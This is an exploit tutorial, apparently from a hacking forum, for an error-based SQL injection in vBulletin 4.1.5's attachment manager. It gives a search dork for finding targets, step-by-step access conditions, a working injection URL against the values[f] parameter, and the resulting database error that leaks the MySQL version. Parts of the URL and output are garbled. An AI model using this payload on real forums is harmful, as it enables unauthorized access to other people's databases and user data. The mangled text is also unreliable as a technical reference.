Exploit vbulletin 4.1.5

vbulletin 4.1.5 attachment SQLI

examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability
in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to
attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is,
you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage
Attachments' - > Open the window and setting "values ​​[f]" insert our SQL query.
Example:

Code:
http://site.com/board/newattachment....manager&values[f]=-1599+or(1,2)=(select*from(select+name_const(versi
on(),1),name_const(version(),1))a)&contenttypeid=1 8&poststarttime=1360663633&posthash=4f5c850593e10c 5450d9e8
80d58a56d8&insertinline=1
After that, we see the standard error of the database offline, thus opening the source code of the page and see:


Code:
<! -
Database error in vBulletin 4.1.5 :

Invalid SQL :

SELECT
permissionsfrom , Hidden , setpublish , publishdate , userid
FROM ds23fSDdfsdf_cms_node
WHERE
nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const (
version (), 1 )) a );

MySQL Error : Duplicate column Name .1.49-3 '5 '
Error Number : 1060
Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33


Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version :
->
Tut by VHB